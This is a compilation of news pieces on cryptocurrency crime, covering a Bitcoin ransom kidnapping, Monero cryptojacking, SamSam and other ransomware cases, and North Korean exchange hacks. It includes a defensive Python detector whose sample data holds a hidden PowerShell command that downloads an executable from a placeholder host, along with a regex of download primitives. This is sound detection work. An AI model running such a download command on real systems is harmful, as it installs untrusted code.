Mexican Youtuber Arrested Over Bitcoin Ransom Kidnap

A motivational Youtuber from Mexico has been arrested over the alleged kidnapping of Thania Denisse, a 33-year-old lawyer. Germán Loera is thought to have led a gang of five to kidnap the woman. The group are also reported to have demanded the ransom be paid in Bitcoin.

Kidnapper has Scant History of Bitcoin Involvement

Loera has been an active Youtuber creating various motivational and self-help videos. These were relatively unknown until the 23-year-old was reported to be connected with the kidnapping. Naturally, his view counts have risen rapidly since then. Local news source El Pais reports that the Chihuahua public prosecutor assigned to the case stated:

“According to the investigation, the leader of the gang is Germán Abraham L. A., who has several videos on the internet as a Youtuber.”

The young internet personality is currently being held in custody and awaiting trial. Whilst he has no prior convictions, local media have hinted at a potential motive. Following the arrest, outlets reported that Loera’s father was recently murdered by a group of organised criminals. This was later confirmed by the public prosecutor, although no explicit link has yet been made between the kidnapping and the murder.

There are also no real previous connections between Loera and Bitcoin. The only clue might lie in a Tweet to Bitso, one of the first Mexican cryptocurrency exchanges. The Tweet read:

“I’d like to speak to you. We are the heads of marketing for the biggest bitcoin casinos in the world.”

The message did not receive a public reply, however. It therefore seems likely that the decision to demand the ransom in Bitcoin was made because of its pseudonymous qualities and the common misconception that Bitcoin transactions cannot be traced, rather than anything deeper.

Since the story broke, comments on social media have been particularly scathing toward the accused kidnapper. Some have called him a “delinquent” or a “liar” because of the hypocrisy of his self-help videos. Meanwhile, others have called for him to be executed by the state – despite the fact that the death penalty does not exist in Mexico.

The case of Loera is not the first time a kidnap ransom has been demanded in Bitcoin. Late last year we reported on a crypto-analyst at UK cryptocurrency exchange EXMO being kidnapped in Ukraine. The exchange ended up paying over $1 million for Pavel Lerner’s release.

Meanwhile, Bitcoin continues to be used by cybercriminals as a tool in ransomware attacks. These “digital kidnappings” involve locking the data on infected machines. Hackers then demand payment in Bitcoin for the release of the information. Last year, the WannaCry attack is thought to have infected over 200,000 computers in 150 countries.


Several things have come together in a perfect storm to create the most recent crypto-crime trend: the ability to surreptitiously install illicit Monero miners on unsuspecting computers around the world. Windows servers, laptops, Android devices, and IoT connected devices are all at risk.

The worst part? Targets often are unaware that they’ve been hacked — unless they’re able to recognize an occasional performance slowdown or can closely monitor their electric use. No ransoms, no stolen passwords or personal information; victims may even find it difficult to convince anyone there’s a problem.

Perfect Storm

  1. In 2017 a hacker group released a National Security Agency-created hack called EternalBlue, which made it easy to crack into computers running Microsoft Windows.
  2. Cryptomining itself: blockchain-based systems rely on miners, who automatically receive a payment or reward in whatever coin they choose to process, in return for their contribution.
  3. Cryptocurrency users looking for more anonymity than offered with Bitcoin developed Monero, an altcoin better able to hide the tracks of criminal transactions.

Under the Radar

Illicit cryptomining is both profitable and easy enough to mount. As a result, it is rapidly replacing ransomware as the crypto-related cybercrime of choice, especially as cybersecurity vendors bring ransomware protection to market. The combination of the technologies above has created what is essentially a perfect storm, threatening to wreak havoc on computer systems.

“What we’re looking at from a near and potentially long-term perspective is the value of a computer that has just a regular old CPU might be more just leaving it quietly running some cryptocurrency miner rather than infecting it with ransomware or some other software that might steal data,” explains Ryan Olson, Intelligence Director at Palo Alto Networks.

“In this new business model, attackers are no longer penalizing victims for opening an attachment or running a malicious script by taking systems hostage and demanding a ransom,” explain the Talos team. “Now attackers are actively leveraging the resources of infected systems for cryptocurrency mining.”


A large number of compromised devices working together is known as a botnet. Botnets are a common component of a hacker’s toolbox, as they can mount distributed denial of service attacks and various other attacks that require massive amounts of coordinated transaction processing.

In the case of illicit cryptomining, however, each node works independently of the others. Cyber-criminals simply need to install many separate (but connected) miners because each miner only generates a relatively small amount of cryptocurrency.

Case in point: Smominru. Smominru leverages the EternalBlue exploit from the NSA, targeting Windows. The attacker typically mounts a phishing attack with a Microsoft Word file attachment. Once the target downloads the file, it runs a Word macro that executes a Visual Basic script that in turn runs a Microsoft PowerShell script that downloads and installs the miner executable.
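The delivery chain just described (Office document, macro, script host, PowerShell downloader) leaves a distinctive parent-child process trail that endpoint telemetry can catch. The following is an added example, not code from the original article or from any vendor named on the page: it walks a constructed set of Sysmon-style process-creation events (the field names `pid`, `ppid`, `image`, `cmd` are assumptions) and flags any PowerShell process whose ancestry runs back to an Office application, rating it higher when a script host sits in between and the command line contains a download primitive.

```python
"""Flag the Office -> script host -> PowerShell downloader chain in process telemetry.

Added example (not the page's or any vendor's code). Events are constructed and
modelled loosely on Sysmon event ID 1 fields; the field names are assumptions.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Common PowerShell download primitives seen in macro-launched droppers.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)

# Constructed sample events. PIDs are simplified integers; the host is a placeholder.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmd": 'WINWORD.EXE /n "C:\\Users\\u\\Downloads\\invoice.docm"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": "wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\upd.vbs"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c (New-Object Net.WebClient)"
            ".DownloadFile('http://example.invalid/m.exe','C:\\Users\\u\\AppData\\Local\\Temp\\m.exe')"},
    # Benign control case: an admin downloading a tool from a console, no Office ancestor.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid):
    """Yield image basenames from pid up to the root, guarding against PID reuse loops."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        event = by_pid[pid]
        yield basename(event["image"])
        pid = event["ppid"]


def find_office_downloader_chains(events):
    """Return one finding per PowerShell process that descends from an Office application."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        if basename(event["image"]) != "powershell.exe":
            continue
        chain = list(ancestry(by_pid, event["pid"]))  # [powershell, parent, grandparent, ...]
        if not any(img in OFFICE_APPS for img in chain[1:]):
            continue
        via_script_host = any(img in SCRIPT_HOSTS for img in chain[1:])
        downloads = bool(DOWNLOAD_RE.search(event["cmd"]))
        severity = "high" if (via_script_host and downloads) else "medium"
        findings.append({
            "pid": event["pid"],
            "chain": " <- ".join(chain),
            "script_host": via_script_host,
            "download": downloads,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for finding in find_office_downloader_chains(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] pid={finding['pid']} chain={finding['chain']}")
```

The benign console download in the sample is deliberately left unflagged: the signal is the Office ancestor, not the download itself.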


One of the main cryptocurrencies that makes this whole process work is the newly-developed anonymous cryptocurrency Monero. “Bitcoin alternatives like Monero and Ethereum continue their overall upward trend in value,” explains Sandiford Oliver, Cybersecurity Researcher for Proofpoint, “putting them squarely in the crosshairs of threat actors looking for quick profits and anonymous transactions.”

While other cryptocurrencies do have their own roles, Monero is shaping up to be the favorite. “This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe,” says Kevin Epstein, Vice President of Proofpoint’s Threat Operations Center.

Employees at the Colorado Department of Transportation (CDOT) spent the second day offline today, while security officials — including the FBI — continue to investigate a ransomware virus that hijacked computer files and demanded payment in Bitcoin for their return.

According to Amy Ford, a CDOT spokeswoman, only employee computers running Windows and equipped with McAfee security software were impacted.

“No one is back online. What we’re doing is working offline. All our critical services are still online — cameras, variable message boards, CoTrip, alerts on traffic. They are running on separate systems,” Ford said. “The message I’m sharing [with employees] is CDOT operated for a long time without computers so we’ll use pen and paper.”


The ordeal began on Wednesday morning when CDOT shut down more than 2,000 employee computers and began investigating the attack. The malicious code was a variant of ransomware called SamSam, according to Brandi Simmons of the Governor’s Office of Information Technology (OIT). Later in the day, in attempts to prevent further damage, McAfee, the security software used by the CDOT computers, provided a software patch to stop the execution of the ransomware.

“This ransomware virus was a variant and the state worked with its antivirus software provider to implement a fix today. The state has robust backup and security tools and has no intention of paying ransomware. Teams will continue to monitor the situation closely and will be working into the night,” said OIT chief technology officer David McCurdy in a statement.

The OIT, which reached out to the FBI for assistance, is still investigating the attack and has not paid a cent to the attackers, nor does it plan to, according to Simmons:

“No payments have been made or will be made. We are still investigating to see whether or not files were damaged or recovered,” she said in an email.

As noted, the ransomware was a variant of SamSam, which last made headlines in January after targeting the healthcare industry. It encrypted files and renamed them “I’m sorry,” according to a report by security firm TrendMicro. One hospital in Indiana, Hancock Health, paid $55,000 to get its files back. To make things worse, a growing problem is that paying cyber-jackers isn’t always easy in itself — sometimes other hackers hijack the ransom payments before they are received and redirect them into their own cryptocurrency wallets.

These remote hacks are becoming more and more common — just last week Elon Musk’s cloud was hacked. In this case, though, the cyber-attackers didn’t steal information: They used his computer system’s power to mine cryptocurrencies, deeming it more profitable than extracting files and demanding ransom.

Ransomware distributors and other cybercriminals expecting an easy payday are having their illicitly obtained “earnings” stolen by likeminded individuals, who are hijacking the ransom payments before they are received and redirecting them into their own cryptocurrency wallets. At first glance, this may not seem like a huge problem — attackers getting a taste of their own medicine in becoming victims of cyber-theft themselves. But these attacks are also preventing ransomware victims from unlocking their encrypted files, because, as far as those distributing the malware are concerned, they never received their ransom payment.

Ransomware is a huge problem for internet users across the globe. It’s a form of malicious software — malware — which encrypts documents on a computer or across a network. Victims can often only regain access to their encrypted files and/or networks by paying a ransom to the criminals behind the ransomware.

Uncovered by researchers at Proofpoint, this scheme is believed to be the first of its kind. So how are these attacks actually happening? Cybercriminals are using a Tor proxy (the Tor Browser is designed for anonymous web surfing) to carry out man-in-the-middle attacks, stealing the cryptocurrency payments that ransomware victims are attempting to send to their attackers.

The attacks take advantage of the way ransomware distributors have victims use Tor to buy the cryptocurrency they need to make the ransom payment. While many ransomware notes provide instructions on how to download and run the Tor browser, others provide links to a Tor proxy, regular websites that translate Tor traffic into normal web traffic (so the process of paying is as straightforward as possible for the victim).

What has been happening is that one of the Tor gateways in use alters the cryptocurrency wallet addresses on the proxied payment page, redirecting the payment into accounts other than the ransomware attacker’s. Proofpoint researchers found that the proxy can redirect payments made by victims of several forms of ransomware, including LockeR, GlobeImposter, and Sigma.

As noted above, the victims, like the state of Alabama, are the ultimate losers in this scenario. Not only are they paying thousands of dollars in ransom demands, they’re not even getting their files back. These middle-man attacks mean the ransomware distributors don’t get the funds they demand from the victims and therefore don’t help said victims unlock their encrypted files.

Cyber researchers at Fortinet have unearthed a cryptocurrency app that is actually ransomware in disguise.

The cybersecurity firm, in its report, identified the SpriteCoin app as a new kind of ransomware technique. It poses as a “sure-to-be-profitable” cryptocurrency, prompts targets into installing it for profit, and then encrypts their files. The ransomware demands 0.3 Monero (~$100) in exchange for a decryption key. But once the targets pay the sum, they are hit with further malware attacks.

SpriteCoin seems to have an embedded SQLite engine. This has led researchers to believe that the database engine is being used to store harvested credentials. The Fortinet report explains:

“The ransomware first looks to harvest Chrome credentials, and if it finds nothing it then moves on and tries to access the Firefox credential store. It then looks for specific files to encrypt. These files are then encrypted with [a] .encrypted file extension.”

In simple terms, the passwords stored in the target’s Chrome and/or Firefox are sent to remote servers, where the attackers can use them for any malicious purpose.

Social Engineering to Lure Targets

SpriteCoin is one of the first malware attacks to be delivered in the form of a cryptocurrency wallet. Traditional ransomware techniques, on the other hand, rely on phishing websites and emails. But the underlying technique of every ransomware remains the same: social engineering.

It is to be noted that every ransomware out there pretends to offer something ridiculously attractive in return for some confidential information/file download. These messages may contain a compelling story and context – a cliffhanger – to make you either click on the attached links or files. It is always recommended to follow a think-first-act-later policy.

Bitcoin Losing Steam in Ransomware Department

The SpriteCoin ransomware also supports reports of hackers’ declining interest in demanding payments denominated in Bitcoin. Just recently, a California-based enterprise cybersecurity firm noted a steep 73% decline in Bitcoin ransomware demands. At the same time, it was assumed that hackers would choose a local fiat currency or an alternative cryptocurrency over Nakamoto’s brainchild.

China is a country where cryptocurrencies are frowned upon, for many different reasons, including their potential to disrupt the financial ecosystem. However, there is another big threat most people seem to be unaware of right now: a lot of new Bitcoin-related scams have appeared out of nowhere. These are the findings of Kroll, a global risk management firm. At this rate, it is highly unlikely China will ever soften its stance on cryptocurrency.

The findings by global risk management firm Kroll paint a worrisome future. China is home to a lot of Bitcoin-related scams as of right now. Given the government’s negative stance toward cryptocurrencies, that is a bit of a surprise. At the same time, this is also part of a growing fraud threat in the country. More specifically, close to 90% of all Chinese companies faced some form of cybercrime in 2017. This is an extremely worrisome trend, and it’s unsurprising Bitcoin plays a role in all of this.

China Falls Victim to More Cybercrime

More specifically, the country is in the process of adopting new technologies. With every new generation of innovation come additional security risks. Innovations make consumers’ daily lives more convenient, but they also bear risks. As such, we see more and more cyber fraud and scams in the Chinese market right now. Cybercriminals have been targeting people with an interest in Bitcoin for quite some time, and this report seems to indicate that trend will continue for quite some time to come.

For the time being, it is a bit unclear exactly how people in China are being defrauded of Bitcoin. The most common cyber threats include viruses, phishing, and data breaches. Data deletion, wire transfer fraud, and ransomware are all in the lower segments as of right now. This seems to indicate the role of Bitcoin is a lot less prominent than most people might expect. Since the report is not too clear on this front, Bitcoin’s role remains unclear for the time being.

One thing is certain: Chinese companies need to step up their game. A lot of companies have increased fraud awareness as we speak. However, there is still room for future improvements. Especially when it comes to conducting proper background checks, things can certainly improve a lot. Hiring the right people to take care of these problems is the top priority right now. Most of the cyber threats can be avoided with common sense as well.

Cybercrime experts are attributing the most recent Bitcoin heist to North Korea. The Wall Street Journal reports that the South Korean cryptocurrency exchange YouBit is the latest victim of a malicious hacking, and that their northern neighbours are to blame. YouBit has been forced to declare bankruptcy after 17 percent of its digital assets were stolen. It is allowing customers to immediately withdraw three quarters of the funds in their accounts. The remaining sums will be paid out following the liquidation of the exchange.

The allegations come just one day after the US laid the blame for the WannaCry cryptographic worm attack on North Korea. Ars Technica reports that White House National Security Adviser Tom Bossert stated yesterday:

“We do not make this allegation lightly. It is based on evidence. We are not alone with our findings, either. Other governments and private companies agree. The United Kingdom attributes the attack to North Korea, and Microsoft traced the attack to cyber affiliates of the North Korean government.”

The WannaCry ransomware attack targeted users of the Windows operating system this spring. It is estimated to have infected over 300,000 computers across the globe. Computers and their contents were frozen and a demand for Bitcoin was then made to those affected.

These examples are not the first time that the communist dictatorship of North Korea has been implicated in such heists. Just this year, three additional attacks on South Korean exchanges have been blamed on operatives working under Kim Jong Un. The largest was on Yapizon, YouBit’s predecessor, which was compromised back in April. That digital heist saw even larger sums of cryptocurrency lifted.

A report issued back in September by cyber security firm FireEye acknowledged the motive behind North Korea’s interest in digital currency. The fact that cryptocurrencies offer permissionless movement of funds across the planet makes them ideal for laundering money and evading sanctions. Hackers can then use coin tumbling services to “clean” funds. Alternatively, they can exchange Bitcoin involved in a hack for a much less traceable currency like the anonymity coin Monero. It’s believed that this is what occurred following the WannaCry outbreak.

For a country trying to fight off aggressive international sanctions and continue its militarisation, cryptocurrency seems to present an obvious solution to traditional financial channels being closed off. Ars Technica estimates that some $16 billion has been lifted by North Korea to finance its foreign policy objectives. Whilst this is a pittance compared with the over $612 billion market cap of all cryptocurrency, for a nation currently in the midst of economic strangulation, it’s certainly worth going after.

In response to a spate of hackings, some law firms have made the decision to preemptively open Bitcoin wallets to pay their attackers. John Sweeney, president of IT and cyber security advisory company LogicForce claimed that accounts would be used to settle ransoms as a “last resort” and the measure should be part of a wider contingency plan.

For Sweeney, the decision is proactive rather than reactive. However, what exactly is proactive about waiting to get hacked and then paying a ransom is unclear. There aren’t even any guarantees that the criminals will release the breached data following settlement of demands. According to the cyber security expert himself, it has taken some firms months and multiple ransoms to even recover data from hackers. Even then, the data may already be compromised, rendering confidentiality agreements between clients and companies useless and potentially exposing sensitive details.

The latest security breach was announced earlier today. An offshore law firm catering to super-rich clients was hacked by a criminal group. Those served by Appleby in Bermuda will be awaiting the criminals’ next move, which will likely be either blackmail or straight-up exposure. This highlights a major issue with law firms’ security which Sweeney says needs to be tackled. Data is often sent via unencrypted emails and thus risks being breached by any hacker savvy enough to get around the often scant security procedures in place. Certain data obtained in this way is understandably extremely valuable to the parties concerned. Sweeney commented on the growing trend within the industry:

We are predicting there are going to be more sophisticated attempts to intrude at firms that work with highly visible clients whose IP or business information is extremely valuable.

Exacerbating the problem is the fact that cyber-criminals can often cover their own tracks impeccably. This makes it unlikely that they’ll be caught and, for Sweeney, it represents a risk/reward proposition that’s “totally in the cyber criminals’ favour.”

However, the decision to announce that some firms will have a digital wallet loaded with funds to pay off hackers seems to do little more than paint a huge target on the law industry. Clearly, by having the money ready, the implication is that firms are willing to settle ransoms, leaving them further exposed. Sweeney does, however, urge firms to do more to enhance their security and eliminate potential online attack vectors. There is no shortage of funds within the law industry, so in reality there is no excuse for not employing the most up-to-date encryption techniques for sensitive data, as well as suitable backup solutions. Prevention, as they say, is much better than cure.

Yet another incident of hackers using Bitcoin as a payment method for ransomware attacks has surfaced. One of the largest counties in Alabama was the victim this time, and the security breach and subsequent encryption of sensitive information cost the local government a not-inconsequential $37,000.

The figure sounds like a lot, but when you consider that County Commission Chairman Elton Dean estimates the value of the seized data at around $5 million, the county reclaimed its appropriated digital property for an absolute bargain. He also called the attack an “emergency situation,” a comment which probably made the hackers wish they’d asked for a greater sum of money.

The county paid the ransom on Friday after an emergency meeting was held by the Montgomery County Commission to authorize the payment to the cybercriminals. At the current market value of Bitcoin, the security breach cost them just over 9 BTC, according to local news sources.

Hannah Hawk, a spokesperson for Montgomery County said that the attack “locked up” the county’s data using encryption methods. This prevented the necessary departments from accessing various pieces of sensitive information. Data ranged from vehicle tags to business and marriage licenses. Hawk also reminded officials and the public that no personal information had actually been stolen. This is because the hackers had charged the county for a key for the decryption of data, and therefore never actually had access to the information themselves.

Following the attack, the county had been working alongside the FBI to restore data from backups, but “issues” with the files had forced them to cede to demands. However, the federal investigators did not condone the payment of ransom, claiming that payment does not guarantee the delivery of files.

“There have been cases where organisations never got a decryption key after having paid the ransom. Paying a ransom not only emboldens current cyber criminals to target more organisations, it also offers an incentive for other criminals to get involved in this type of illegal activity. And by paying a ransom, an organisation might inadvertently be funding other illicit activity.”

Despite these warnings, the chief IT officer for Montgomery County, AL, did confirm that those targeting the local government with ransomware had indeed restored all the data and that no sensitive information had been compromised. How exactly they were able to ensure that a copy of all the sensitive information was not made to sell on the black market, thus further increasing the revenue generated from the scam, we’re not quite sure. However, Lou Ialacci seemed adamant this was the case:

“I hate to say this, but their reputation is that they do return stuff. They think of themselves as modern day Robin Hoods, they are here helping the masses. They are the good guys, they are going to come in, hack you and grab the files. If you pay them, that’s your punishment for letting them in.”

Despite these recent developments, the guidelines to deal with ransomware attacks remain the same. It is advisable not to pay ransom to the perpetrators as there is no guarantee that they will provide the decryption key after receiving funds. Meanwhile, good internet usage practices and creating regular backups of sensitive data will help users avoid being held to ransom by cybercriminals.

Ref: WSFA 

Bitcoin and cryptocurrency have often been associated with ransomware over the past few months. Most types of malware effectively demand a payment in BTC before files are restored. nRansom proves to be a very different creature, as it has no interest in cryptocurrency whatsoever. That is good news for the industry, but the new payment method is even stranger. Victims are asked to send at least 10 different naked pictures to the criminals.

It is evident cybercriminals are getting weirder when it comes to ransomware infections. nRansom is one of the oddest creations we have come across to date. While it’s good to see there is no demand for Bitcoin, asking for nude pictures is pretty offensive. It is unclear where this sudden change comes from, though. Bitcoin has been a preferred payment method for ransomware developers over the past two to three years.

nRansom is a Creepy Type of Ransomware

What is even creepier about nRansom is the reference to Thomas the Tank Engine. It is displayed as your computer’s wallpaper once you are infected with this malicious software. The combination of demanding naked pictures and a picture of Thomas will creep a lot of people out. Luckily, it does not appear this type of malware is spread on a large scale just yet. It is a very disturbing type of ransomware, that much is certain.

However, this malware is a legitimate threat to anyone who gets infected by it. It is officially recognized as a malicious software package by most antivirus engines right now. Plus, it appears there may be other variations of the same ransomware floating around the world wide web as we speak. No one knows for sure how it is distributed right now, though. Given the few samples spotted so far, it doesn’t appear that distribution of this malware is a priority right now.

All of this goes to show cybercriminals come in many different forms and shapes. Most of them do it for fame and money. Others are far more perverted in nature, that much is rather obvious. Anyone infected with nRansom should never meet the demands of the criminals. That goes for any type of ransomware, but this one in particular right now. It will be interesting to see if nRansom will effectively become a big threat or not. For now, it doesn’t look like it, but things can change at any time.